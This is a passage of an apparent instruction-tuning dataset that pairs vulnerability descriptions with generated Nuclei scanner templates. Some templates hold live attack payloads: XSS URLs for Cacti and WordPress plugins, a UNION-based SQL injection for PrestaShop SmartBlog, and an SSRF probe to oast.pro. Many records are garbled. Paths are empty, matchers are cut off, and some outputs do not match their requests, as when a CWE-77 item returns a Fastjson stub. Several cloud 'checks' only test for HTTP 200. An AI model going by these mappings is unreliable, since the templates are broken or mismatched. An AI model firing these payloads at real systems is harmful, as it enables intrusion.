info\nIndicators: vulnerability detected", "output": "id: titan-ftp-detect\n\ninfo:\n name: Titan FTP Service - Detect\n author: pussycat0x\n severity: info\n description: Titan FTP service was detected.\n tags: network,ftp,titan,detect,tcp,discovery\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "titan-ftp-detect"} +{"instruction": "Generate a Nuclei template to detect Command Injection", "input": "Title: Command Injection (CWE-77)\nSummary: The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component. Many protocols and products have their own custom command language. While OS or shell command strings are frequently discovered and targeted, developers may not realize that these other command languages might also be vulnerable to attac\nVulnerability Type: Command Injection\nSeverity: medium\nIndicators: vulnerability detected, error", "output": "id: fastjson-1-2-62-rce\n\ninfo:\n name: Fastjson 1.2.62 - Remote Code Execution\n author: zh\n severity: critical\n description: Fastjson 1.2.62 is susceptible to a deserialization remote code execution vulnerability.\n tags: fastjson,rce,deserialization,oast,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"dns\" \n part: interactsh_protocol\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-77"} +{"instruction": "Generate a Nuclei template for CVE-2023-3578", "input": "Title: Vulnerability (CWE-918) in dedecms dedecms\nSummary: A vulnerability classified as critical was found in DedeCMS 5.7.109. Affected by this vulnerability is an unknown functionality of the file co_do.php. The manipulation of the argument rssurl leads to server-side request forgery. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-233371.\nVulnerability Type: Vulnerability (CWE-918)\nSeverity: medium\nAffected Products: dedecms dedecms\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-3578\n\ninfo:\n name: DedeCMS 5.7.109 - Server-Side Request Forgery\n author: ritikchaddha\n severity: critical\n description: Manipulation of the rssurl parameter in co_do.php leads to server-side request forgery in DedeCMS version 5.7.109.\n tags: cve,cve2023,dedecms,ssrf,oast,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"DedeCms\" \n part: response\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"dns\" \n - \"http\" \n part: interactsh_protocol", "category": "cve", "severity": "medium", "id": "CVE-2023-3578"} +{"instruction": "Generate a Nuclei template for: Azure Storage Queue Logging Not Enabled", "input": "Title: Azure Storage Queue Logging Not Enabled\nSummary: Azure Storage Queue Logging Not Enabled. Ensure that Microsoft Azure Storage Queue service logging is enabled for read, write, and delete requests. The Storage Queue service records details of both successful and failed requests, including end-to-end latency, server latency, and authentication information, which is crucial for security and compliance.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: azure-storage-queue-logging-disabled\n\ninfo:\n name: Azure Storage Queue Logging Not Enabled\n author: princechaddha\n severity: high\n description: Ensure that Microsoft Azure Storage Queue service logging is enabled for read, write, and delete requests. The Storage Queue service records details of both successful and failed requests, including end-to-end latency, server latency, and authentication information, which is crucial for security and compliance.\n tags: cloud,devops,azure,microsoft,storage-queue,azure-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "azure-storage-queue-logging-disabled"} +{"instruction": "Generate a Nuclei template for CVE-2021-27858", "input": "Title: Missing Authorization in fatpipeinc ipvpn_firmware and others\nSummary: A missing authorization vulnerability in the web management interface of FatPipe WARP, IPVPN, and MPVPN software prior to versions 10.1.2r60p91 and 10.2.2r42 allows a remote attacker to access at least the URL \"/fpui/jsp/index.jsp\" leading to unknown impact, presumably some violation of confidentiality. Older versions of FatPipe software may also be vulnerable. The FatPipe advisory identifier for this vulnerability is FPSA004.\nVulnerability Type: Missing Authorization\nSeverity: medium\nAffected Products: fatpipeinc ipvpn_firmware, fatpipeinc mpvpn_firmware, fatpipeinc warp_firmware\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-27858\n\ninfo:\n name: FatPipe WARP/IPVPN/MPVPN - Authorization Bypass\n author: gy741\n severity: medium\n description: FatPipe WARP, IPVPN, and MPVPN software prior to versions 10.1.2r60p91 and 10.2.2r42 contain a missing authorization caused by lack of access control in the web management interface, letting remote attackers access sensitive URLs, exploit requires no authentication.\n tags: cve,cve2021,fatpipe,auth-bypass,router,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"productType\" \n - \"type:\" \n - \"version:\" \n - \"FatPipe Networks\" \n condition: and", "category": "cve", "severity": "medium", "id": "CVE-2021-27858"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: ez-publish-panel\n\ninfo:\n name: eZ Publish Login Panel - Detect\n author: ritikchaddha\n severity: info\n description: eZ Publish login panel was detected.\n tags: panel,ez,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"content=\"eZ Publish\" \n part: body\n - type: word\n words:\n - \"eZ Publish\" \n part: header", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template for CVE-2021-26247", "input": "Title: Cross-Site Scripting (XSS) in cacti cacti\nSummary: As an unauthenticated remote user, visit \"http:///auth_changepassword.php?ref=\" to successfully execute the JavaScript payload present in the \"ref\" URL parameter.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: cacti cacti\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-26247\n\ninfo:\n name: Cacti - Cross-Site Scripting\n author: dhiyaneshDK\n severity: medium\n description: Cacti contains a cross-site scripting vulnerability via \"http:///auth_changepassword.php?ref=\" which can successfully execute the JavaScript payload present in the \"ref\" URL parameter.\n tags: cve,cve2021,cacti,xss,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/auth_changepassword.php?ref=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E\" \n matchers:\n - type: word\n words:\n - \"\">\" \n part: body\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2021-26247"} +{"instruction": "Generate a Nuclei template for CVE-2021-37538", "input": "Title: SQL Injection in smartdatasoft smartblog\nSummary: Multiple SQL injection vulnerabilities in SmartDataSoft SmartBlog for PrestaShop before 4.06 allow a remote unauthenticated attacker to execute arbitrary SQL commands via the day, month, or year parameter to the controllers/front/archive.php archive controller, or the id_category parameter to the controllers/front/category.php category controller.\nVulnerability Type: SQL Injection\nSeverity: critical\nAffected Products: smartdatasoft smartblog\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-37538\n\ninfo:\n name: PrestaShop SmartBlog <4.0.6 - SQL Injection\n author: whoever\n severity: critical\n description: PrestaShop SmartBlog by SmartDataSoft < 4.0.6 is vulnerable to a SQL injection vulnerability in the blog archive functionality.\n tags: cve2021,cve,prestashop,smartblog,sqli,smartdatasoft,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/module/smartblog/archive?month=1&year=1&day=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT%20MD5(55555)),NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20-\" \n matchers:\n - type: word\n words:\n - \"c5fe25896e49ddfe996db7508cf00534\" \n part: body\n - type: status\n status:\n - 200", "category": "cve", "severity": "critical", "id": "CVE-2021-37538"} +{"instruction": "Generate a Nuclei template for: LinkTap Gateway Exposure", "input": "Title: LinkTap Gateway Exposure\nSummary: LinkTap Gateway Exposure. LinkTap Gateway is exposed.\nVulnerability Type: Security Check\nSeverity: low\nIndicators: vulnerability detected", "output": "id: linktap-gateway-exposure\n\ninfo:\n name: LinkTap Gateway Exposure\n author: DhiyaneshDk\n severity: low\n description: LinkTap Gateway is exposed.\n tags: misconfig,linktap,iot,exposure,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Device infomation\" \n - \"Ethernet settings\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "generic", "severity": "low", "id": "linktap-gateway-exposure"} +{"instruction": "Generate a Nuclei template for: RDP Security Checks", "input": "Title: RDP Security Checks\nSummary: RDP Security Checks. A simple workflow that runs all RDP related nuclei templates on a given target.\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: rdp-workflow\n\ninfo:\n name: RDP Security Checks\n author: pussycat0x\n severity: info\n description: A simple workflow that runs all RDP related nuclei templates on a given target.\n tags: unknown\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "rdp-workflow"} +{"instruction": "Generate a Nuclei template for CVE-2017-17059", "input": "Title: Cross-Site Scripting (XSS) in amtythumb_project amtythumb\nSummary: XSS exists in the amtyThumb amty-thumb-recent-post (aka amtyThumb posts or wp-thumb-post) plugin 8.1.3 for WordPress via the query string to amtyThumbPostsAdminPg.php.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: amtythumb_project amtythumb\nIndicators: error, vulnerability detected", "output": "id: CVE-2017-17059\n\ninfo:\n name: WordPress amtyThumb Posts 8.1.3 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: WordPress amty-thumb-recent-post plugin 8.1.3 contains a cross-site scripting vulnerability via the query string to amtyThumbPostsAdminPg.php.\n tags: cve2017,cve,xss,wp-plugin,packetstorm,wordpress,amtythumb_project,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"Amty Thumb\" \n - \"Tags:\" \n condition: and\n - method: POST\n path:\n - \"{{BaseURL}}/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E=1\" \n matchers:\n - type: word\n words:\n - \"\" \n part: body\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2017-17059"} +{"instruction": "Generate a Nuclei template for: Admin API Key Disclosure", "input": "Title: Admin API Key Disclosure\nSummary: Admin API Key Disclosure. Tags: exposure, token, vuln\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: newrelic-admin-api-key\n\ninfo:\n name: Admin API Key Disclosure\n author: Ice3man\n severity: info\n description: Admin API Key Disclosure\n tags: exposure,token,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "newrelic-admin-api-key"} +{"instruction": "Generate a Nuclei template for CVE-2021-24175", "input": "Title: Authentication Bypass in posimyth the_plus_addons_for_elementor\nSummary: The Plus Addons for Elementor Page Builder WordPress plugin before 4.1.7 was being actively exploited to by malicious actors to bypass authentication, allowing unauthenticated users to log in as any user (including admin) by just providing the related username, as well as create accounts with arbitrary roles, such as admin. These issues can be exploited even if registration is disabled, and the Login widget is not active.\nVulnerability Type: Authentication Bypass\nSeverity: critical\nAffected Products: posimyth the_plus_addons_for_elementor\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-24175\n\ninfo:\n name: The Plus Addons for Elementor Page Builder < 4.1.7 - Authentication Bypass\n author: pussycat0x\n severity: critical\n description: The Plus Addons for Elementor plugin (before version 4.1.7) allowed attackers to bypass authentication, gain admin access, and create accounts with elevated roles, even when registration was disabled and the Login widget was inactive.\n tags: cve,cve2021,wordpress,wp-theme,wpscan,elementor,plus-addons,passive,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/the-plus-addons-for-elementor-page-builder/readme.txt\" \n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2021-24175"} +{"instruction": "Generate a Nuclei template for CVE-2022-2383", "input": "Title: Cross-Site Scripting (XSS) in slickremix feed_them_social\nSummary: The Feed Them Social WordPress plugin before 3.0.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: slickremix feed_them_social\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-2383\n\ninfo:\n name: WordPress Feed Them Social <3.0.1 - Cross-Site Scripting\n author: akincibor\n severity: medium\n description: WordPress Feed Them Social plugin before 3.0.1 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape a parameter before outputting it back in the page.\n tags: cve,cve2022,wp,wordpress,wp-plugin,wpscan,xss,slickremix,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"Feed Them Social\" \n - \"Tags:\" \n condition: and\n - method: GET\n path:\n - \"{{BaseURL}}/wp-admin/admin-ajax.php?action=fts_refresh_token_ajax&feed=instagram&expires_in=%3Cimg%20src%20onerror%3Dalert%28document.domain%29%3E\" \n matchers:\n - type: word\n words:\n - \"
\" \n part: body\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2022-2383"} +{"instruction": "Generate a Nuclei template for: Diced Zipline - Detect", "input": "Title: Diced Zipline - Detect\nSummary: Diced Zipline - Detect. Zipline panel was detected.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: zipline-panel\n\ninfo:\n name: Diced Zipline - Detect\n author: icarot\n severity: info\n description: Zipline panel was detected.\n tags: diced,zipline,login,panel,detect,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/auth/login\" \n matchers:\n - type: word\n words:\n - \"\"title\":\"Zipline\"\" \n - \"Zipline \u2013 Login\" \n condition: or\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "zipline-panel"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: hestia-panel\n\ninfo:\n name: Hestia Control Panel Login - Detect\n author: JustaAcat\n severity: info\n description: Hestia Control Panel login was detected.\n tags: panel,hestia,detect,hestiacp,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/login/\" \n matchers:\n - type: word\n words:\n - \"Hestia Control Panel\" \n - \"Welcome to Hestia Control\" \n part: body\n condition: or\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template for: Unrestricted SMTP Access in Azure NSGs", "input": "Title: Unrestricted SMTP Access in Azure NSGs\nSummary: Unrestricted SMTP Access in Azure NSGs. Ensure that Microsoft Azure network security groups (NSGs) do not allow unrestricted inbound access on TCP port 25, used for Simple Mail Transfer Protocol (SMTP), to prevent spam and unauthorized email relay.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: azure-nsg-smtp-unrestricted\n\ninfo:\n name: Unrestricted SMTP Access in Azure NSGs\n author: princechaddha\n severity: high\n description: Ensure that Microsoft Azure network security groups (NSGs) do not allow unrestricted inbound access on TCP port 25, used for Simple Mail Transfer Protocol (SMTP), to prevent spam and unauthorized email relay.\n tags: cloud,devops,azure,microsoft,nsg,azure-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "azure-nsg-smtp-unrestricted"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: neos-panel\n\ninfo:\n name: Neos CMS Login Panel - Detect\n author: k11h-de\n severity: info\n description: Neos CMS login panel was detected.\n tags: panel,neos,cms,login,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/neos/login\" \n matchers:\n - type: word\n words:\n - \"Neos comes with ABSOLUTELY NO WARRANTY\" \n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: chaturbate\n\ninfo:\n name: Chaturbate User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Chaturbate user name information check was conducted.\n tags: osint,osint-porn,chaturbate,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://chaturbate.com/{{user}}/\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"'s Bio and Free Webcam\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template for: Pterodactyl game server - Panel", "input": "Title: Pterodactyl game server - Panel\nSummary: Pterodactyl game server - Panel. Detects Pterodactyl game server management panel.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: pterodactyl-panel\n\ninfo:\n name: Pterodactyl game server - Panel\n author: darses\n severity: info\n description: Detects Pterodactyl game server management panel.\n tags: detect,pterodactyl,panel,oos,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/auth/login\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"pterodactyl_session=\" \n part: header\n - type: word\n words:\n - \"window.SiteConfiguration\" \n part: body", "category": "generic", "severity": "info", "id": "pterodactyl-panel"} +{"instruction": "Generate a Nuclei template for: Content-Security-Policy Bypass - Indeed UK", "input": "Title: Content-Security-Policy Bypass - Indeed UK\nSummary: Content-Security-Policy Bypass - Indeed UK. Tags: xss, csp-bypass, indeed-uk\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: indeed-uk-csp-bypass\n\ninfo:\n name: Content-Security-Policy Bypass - Indeed UK\n author: renniepak,DhiyaneshDK\n severity: medium\n description: Content-Security-Policy Bypass - Indeed UK\n tags: xss,csp-bypass,indeed-uk,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Content-Security-Policy\" \n - \"indeed.com\" \n part: header\n condition: and", "category": "generic", "severity": "medium", "id": "indeed-uk-csp-bypass"} +{"instruction": "Generate a Nuclei template for: Dialogic XMS Admin Console - Detect", "input": "Title: Dialogic XMS Admin Console - Detect\nSummary: Dialogic XMS Admin Console - Detect. Tags: panel, dialogic, admin\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: dialogic-xms-console\n\ninfo:\n name: Dialogic XMS Admin Console - Detect\n author: ritikchaddha\n severity: info\n description: Dialogic XMS Admin Console - Detect\n tags: panel,dialogic,admin,login,detect,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php\" \n matchers:\n - type: word\n words:\n - \"Dialogic XMS Admin Console\" \n part: body\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "dialogic-xms-console"} +{"instruction": "Generate a Nuclei template to detect Insufficiently Protected Credentials", "input": "Title: Insufficiently Protected Credentials (CWE-522)\nSummary: The product transmits or stores authentication credentials, but it uses an insecure method that is susceptible to unauthorized interception and/or retrieval.\nVulnerability Type: Insufficiently Protected Credentials\nSeverity: medium\nIndicators: unauthorized", "output": "id: guacamole-default-login\n\ninfo:\n name: Guacamole Default Login\n author: r3dg33k\n severity: high\n description: Guacamole default admin login credentials were detected.\n tags: guacamole,default-login,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"\"username\"\" \n - \"\"authToken\"\" \n - \"\"guacadmin\"\" \n condition: and\n - type: word\n words:\n - \"application/json\" \n part: header\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-522"} +{"instruction": "Generate a Nuclei template for: Apache Allura - Detection", "input": "Title: Apache Allura - Detection\nSummary: Apache Allura - Detection. Detects a Apache Allura server, a open source implementation of a software \"forge\".\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: apache-allura-detect\n\ninfo:\n name: Apache Allura - Detection\n author: icarot\n severity: info\n description: Detects a Apache Allura server, a open source implementation of a software \"forge\".\n tags: tech,allura,apache,detect,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/neighborhood\" \n matchers:\n - type: word\n words:\n - \"All Neighborhoods\" \n - \">Apache Allura\" \n condition: and\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "apache-allura-detect"} +{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: mybuildercom\n\ninfo:\n name: MyBuilder.com User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: MyBuilder.com user name information check was conducted.\n tags: osint,osint-social,mybuildercom,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://www.mybuilder.com/profile/view/{{user}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"feedback\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} +{"instruction": "Generate a Nuclei template for: Content-Security-Policy Bypass - Google Complete", "input": "Title: Content-Security-Policy Bypass - Google Complete\nSummary: Content-Security-Policy Bypass - Google Complete. Tags: xss, csp-bypass, google-complete\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: google-complete-csp-bypass\n\ninfo:\n name: Content-Security-Policy Bypass - Google Complete\n author: renniepak,DhiyaneshDK\n severity: medium\n description: Content-Security-Policy Bypass - Google Complete\n tags: xss,csp-bypass,google-complete,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Content-Security-Policy\" \n - \"google.com\" \n part: header\n condition: and", "category": "generic", "severity": "medium", "id": "google-complete-csp-bypass"} +{"instruction": "Generate a Nuclei template for: Limit SSH Users Group Access", "input": "Title: Limit SSH Users Group Access\nSummary: Limit SSH Users Group Access. Limiting SSH user group access enhances security by restricting login permissions to authorized groups, reducing the attack surface and preventing unauthorized access.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: file-limit-ssh-group\n\ninfo:\n name: Limit SSH Users Group Access\n author: pussycat0x\n severity: info\n description: Limiting SSH user group access enhances security by restricting login permissions to authorized groups, reducing the attack surface and preventing unauthorized access.\n tags: audit,config,file,ssh\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "file-limit-ssh-group"} +{"instruction": "Generate a Nuclei template for: Brother Printer", "input": "Title: Brother Printer\nSummary: Brother Printer. Brother Printer unauthorized access was detected.\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: brother-unauthorized-access\n\ninfo:\n name: Brother Printer\n author: pussycat0x\n severity: medium\n description: Brother Printer unauthorized access was detected.\n tags: iot,printer,unauth,vuln,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/net/net/net.html\" \n matchers:\n - type: word\n words:\n - \"Brother Industries\" \n - \"Network Status\" \n condition: and\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "brother-unauthorized-access"} +{"instruction": "Generate a Nuclei template for: Contact Form 7 Detection", "input": "Title: Contact Form 7 Detection\nSummary: Contact Form 7 Detection. Tags: tech, wordpress, wp-plugin\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: wordpress-contact-form-7\n\ninfo:\n name: Contact Form 7 Detection\n author: ricardomaia\n severity: info\n description: Contact Form 7 Detection\n tags: tech,wordpress,wp-plugin,top-100,top-200,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/contact-form-7/readme.txt\" \n matchers:\n - type: dsl\n - type: regex\n part: body", "category": "generic", "severity": "info", "id": "wordpress-contact-form-7"} +{"instruction": "Generate a Nuclei template for: Readiness Probes not set in Deployments", "input": "Title: Readiness Probes not set in Deployments\nSummary: Readiness Probes not set in Deployments. Checks for missing readiness probes in Kubernetes Deployments, which can lead to traffic being sent to unready containers\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: k8s-readiness-probe-not-set\n\ninfo:\n name: Readiness Probes not set in Deployments\n author: princechaddha\n severity: medium\n description: Checks for missing readiness probes in Kubernetes Deployments, which can lead to traffic being sent to unready containers\n tags: cloud,devops,kubernetes,k8s,devsecops,deployments,k8s-cluster-security\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "k8s-readiness-probe-not-set"} +{"instruction": "Generate a Nuclei template for CVE-2021-24910", "input": "Title: Cross-Site Scripting (XSS) in transposh transposh_wordpress_translation\nSummary: The Transposh WordPress Translation WordPress plugin before 1.0.8 does not sanitise and escape the a parameter via an AJAX action (available to both unauthenticated and authenticated users when the curl library is installed) before outputting it back in the response, leading to a Reflected Cross-Site Scripting issue\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: transposh transposh_wordpress_translation\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-24910\n\ninfo:\n name: WordPress Transposh Translation <1.0.8 - Cross-Site Scripting\n author: Screamy\n severity: medium\n description: WordPress Transposh Translation plugin before 1.0.8 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the a parameter via an AJAX action (available to both unauthenticated and authenticated users when the curl library is installed) before outputting it back in the response.\n tags: cve2021,cve,wordpress,wp-plugin,xss,wp,wpscan,transposh,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-admin/admin-ajax.php?action=tp_tp&e=g&m=s&tl=en&q=\" \n matchers:\n - type: word\n words:\n - \"\" \n - \"{\"result\":\" \n part: body\n condition: and\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2021-24910"} +{"instruction": "Generate a Nuclei template for: Azure Blob Core Service - Detect", "input": "Title: Azure Blob Core Service - Detect\nSummary: Azure Blob Core Service - Detect. This template detects the presence of 'blob.core.windows.net' in the response body, indicating potential references to Azure Blob Storage.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: azure-blob-core-detect\n\ninfo:\n name: Azure Blob Core Service - Detect\n author: ProjectDiscoveryAI\n severity: info\n description: This template detects the presence of 'blob.core.windows.net' in the response body, indicating potential references to Azure Blob Storage.\n tags: azure,blob,detect,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"blob.core.windows.net\" \n part: response", "category": "generic", "severity": "info", "id": "azure-blob-core-detect"} +{"instruction": "Generate a Nuclei template to detect Server-Side Request Forgery", "input": "Title: Server-Side Request Forgery (CWE-918)\nSummary: The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination.\nVulnerability Type: Server-Side Request Forgery\nSeverity: high\nIndicators: vulnerability detected, error", "output": "id: WSO2-2019-0598\n\ninfo:\n name: WSO2 <5.8.0 - Server Side Request Forgery\n author: Amnotacat\n severity: medium\n description: WSO2 prior to version 5.8.0 is susceptible to a server-side request forgery vulnerability. This vulnerability can be exploited by misusing the UI gadgets loading capability of the shindig web application. An attacker can alter a specific URL in the request causing the server to initiate a GET request to the altered URL.\n tags: ssrf,wso2,shindig,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/shindig/gadgets/proxy?container=default&url=http://oast.pro\" \n matchers:\n - type: word\n words:\n - \"Interactsh Server\" \n - type: status\n status:\n - 200", "category": "cwe", "severity": 